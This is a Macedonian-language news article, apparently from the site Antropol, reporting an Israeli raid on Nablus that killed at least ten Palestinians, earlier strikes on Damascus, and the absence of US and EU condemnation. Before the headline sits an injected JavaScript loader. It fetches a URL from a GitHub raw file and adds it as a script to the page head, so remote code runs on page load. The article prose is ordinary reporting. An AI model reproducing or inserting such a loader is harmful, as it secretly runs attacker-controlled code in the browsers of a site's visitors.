;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); По воениот напад врз Сирија, Израел ја нападна и Палестина - САД И ЕУ молчат - Антропол
АктуелноИнтернационално

По воениот напад врз Сирија, Израел ја нападна и Палестина – САД И ЕУ молчат

Најмалку десет Палестинци се убиени, а повеќе од 100 се повредени во конфликти кои избувнаа кога израелски војници влегле во палестинскиот град Наблус на Западниот брег, соопштија палестински здравствени службеници.

Во конфликтот една зграда е срамнета со земја, а продавниците се оштетени од куршуми, со што ова е еден од најсмртоносните инциденти во изминатата година на Западниот брег и во анектираниот источен Ерусалим, а може да се очекува да следи и ново крвопролевање, пренесе Бета.

Хамас, кој е на власт во втората палестинска територија – Појасот Газа, предупреди дека „трпеливоста му е при крај“. Хамас војуваше со Израел четири пати откако во 2007 година ја презеде контролата врз Појасот Газа од силите лојални на умерениот Фатах.

Потсетуваме, пред само неколку дена Израел го гранатираше сирискиот главен град Дамаск, непосредно по случувањето на најголемиот земјотрес и една од најголемите трагедии во земјата.

Сириската опсерваторија за човекови права, која врши воен мониторинг со седиште во Велика Британија, објави дека 15 лица, биле убиени во напади насочени кон локации поврзани со иранските милиции и либанската милитантна група Хезболах.

Од земјите членки на Европската Унија и САД засега нема официјални осудувања за злоделата на израелската армија, единствено, Генералниот секретар на OОН Антонио Гутереш, оцени дека ситуацијата на окупираната палестинска територија е „најзапаллива“. Toj, после повеќе oд неколку години и операцијата во Наблус ја опиша како „длабоко загрижувачка“. Гутереш апелира да се спречи понатамошна ескалација на насилството, да се намали напнатоста и да се врати мирот.